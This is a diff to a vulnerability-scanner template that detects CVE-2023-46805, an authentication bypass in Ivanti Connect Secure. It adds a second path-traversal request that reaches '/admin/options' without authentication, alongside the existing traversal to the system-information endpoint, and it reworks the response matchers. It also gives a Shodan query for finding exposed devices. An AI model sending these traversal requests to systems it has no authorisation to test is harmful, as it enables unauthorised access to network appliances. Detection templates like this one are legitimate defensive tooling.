diff --git a/http/cves/2023/CVE-2023-46805.yaml b/http/cves/2023/CVE-2023-46805.yaml
index 552fabe42b..3efd27fc9c 100644
--- a/http/cves/2023/CVE-2023-46805.yaml
+++ b/http/cves/2023/CVE-2023-46805.yaml
@@ -2,7 +2,7 @@ id: CVE-2023-46805
 
 info:
   name: Ivanti ICS - Authentication Bypass
-  author: DhiyaneshDK
+  author: DhiyaneshDK,daffainfo,geeknik
   severity: high
   description: An authentication bypass vulnerability in the web component of Ivanti ICS 9.x, 22.x and Ivanti Policy Secure allows a remote attacker to access restricted resources by bypassing control checks.
   reference:
@@ -15,33 +15,36 @@ info:
     cwe-id: CWE-287
     cpe: cpe:2.3:a:ivanti:connect_secure:9.0:*:*:*:*:*:*:*
   metadata:
-    max-request: 1
     vendor: ivanti
-    product: "connect_secure"
-    shodan-query: "html:\"welcome.cgi?p=logo\""
+    product: connect_secure
+    shodan-query: html:"welcome.cgi?p=logo"
   tags: cve,cve2023,kev,auth-bypass,ivanti
 
 http:
-  - method: GET
-    path:
-      - "{{BaseURL}}/api/v1/totp/user-backup-code/../../system/system-information"
+  - raw:
+      - |
+        GET /api/v1/totp/user-backup-code/../../system/system-information HTTP/1.1
+        Host: {{Hostname}}
 
-    matchers-condition: and
+      - |
+        GET /api/v1/cav/client/status/../../admin/options HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: or
     matchers:
-      - type: word
-        part: body
-        words:
-          - '"build":'
-          - '"system-information":'
-          - '"software-inventory":'
+      - type: dsl
+        dsl:
+          - 'status_code_1 == 200'
+          - 'contains(body_1, "build")'
+          - 'contains(body_1, "system-information")'
+          - 'contains(body_1, "software-inventory")'
+          - 'contains(all_headers_1, "application/json")'
         condition: and
 
-      - type: word
-        part: header
-        words:
-          - 'application/json'
-
-      - type: status
-        status:
-          - 200
-# digest: 490a0046304402200c2940ac9185c5eb2e95f351128a93769e4ec4fe672f158c99b3b4dc4b84b3a1022029f5e9c610b5d8b080a94548f97227972aee323b91cec07e4d3795f37cdb64ac:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+      - type: dsl
+        dsl:
+          - 'status_code_2 == 200'
+          - 'contains(body_2, "poll_interval")'
+          - 'contains(body_2, "block_message")'
+          - 'contains(all_headers_2, "application/json")'
+        condition: and